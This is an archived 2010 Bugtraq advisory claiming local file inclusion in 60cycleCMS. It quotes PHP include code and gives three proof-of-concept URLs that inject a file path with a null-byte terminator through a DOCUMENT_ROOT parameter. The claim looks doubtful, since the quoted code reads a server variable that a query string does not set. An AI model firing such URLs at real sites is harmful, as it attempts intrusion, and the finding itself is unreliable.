| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201004140037.o3E0blfb031455@www3.securityfocus.com>
Date: Tue, 13 Apr 2010 18:37:47 -0600
From: eidelweiss@...erservices.com
To: bugtraq@...urityfocus.com
Subject: 60cycleCMS (DOCUMENT_ROOT) Multiple Local File Inclusion
Vulnerability
########################################################
[!] Descriptsion
60cycleCMS is a simple CMS using PHP and MySQL. It is designed for blogging on personal websites, and was first written to power 60cycle.net.
For the purposes of easy integration into existing sites, 60cycleCMS does not include a web template.
[!]-=[ Vuln C0de ]=-[!]
[-] 60cycleCMS_path/news.php
<?php
require 'common/lib.php';
$root = $_SERVER['DOCUMENT_ROOT'];
require_once("$root/../config.php");
[-] 60cycleCMS_path/submitComment.php
<?php
session_start();
require_once('lib/recaptchalib.php');
require_once('lib/htmlpurifier-4.0.0/HTMLPurifier.standalone.php');
$root = $_SERVER['DOCUMENT_ROOT'];
require_once("$root/../config.php");
[-] 60cycleCMS_path/common/sqlConnect.php
<?php
// include your sql info file here
$root = $_SERVER['DOCUMENT_ROOT'];
require "$root/../config.php";
[!] -=[ Proof Of Concept ]=-[!]
http://127.0.0.1/60cycleCMS_path/news.php?DOCUMENT_ROOT= [LFI]%00
http://127.0.0.1/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT= [LFI]%00
http://127.0.0.1/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT= [LFI]%00
########################################################
Powered by blists - more mailing lists